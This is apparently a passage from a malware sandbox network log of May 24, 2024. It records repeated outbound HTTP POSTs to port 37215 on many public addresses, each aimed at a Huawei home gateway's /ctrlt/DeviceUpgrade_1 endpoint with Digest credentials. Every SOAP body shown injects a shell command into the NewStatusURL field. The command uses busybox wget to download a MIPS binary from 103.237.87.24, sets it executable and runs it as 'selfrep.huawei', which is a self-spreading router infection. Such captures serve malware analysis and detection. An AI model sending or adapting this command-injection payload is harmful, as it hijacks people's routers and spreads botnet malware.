                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2309192.168.2.1334386197.128.214.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622009039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2310192.168.2.134107241.160.170.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622014046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2311192.168.2.135680841.184.100.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622097015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2312192.168.2.136048841.73.158.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622761965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2313192.168.2.1349936143.218.144.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622802019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2314192.168.2.1357392180.221.102.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622831106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2315192.168.2.1352884105.94.150.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622842073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2316192.168.2.1342634197.171.186.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622921944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2317192.168.2.1333002197.244.214.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622934103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2318192.168.2.1356338126.150.145.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.622944117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 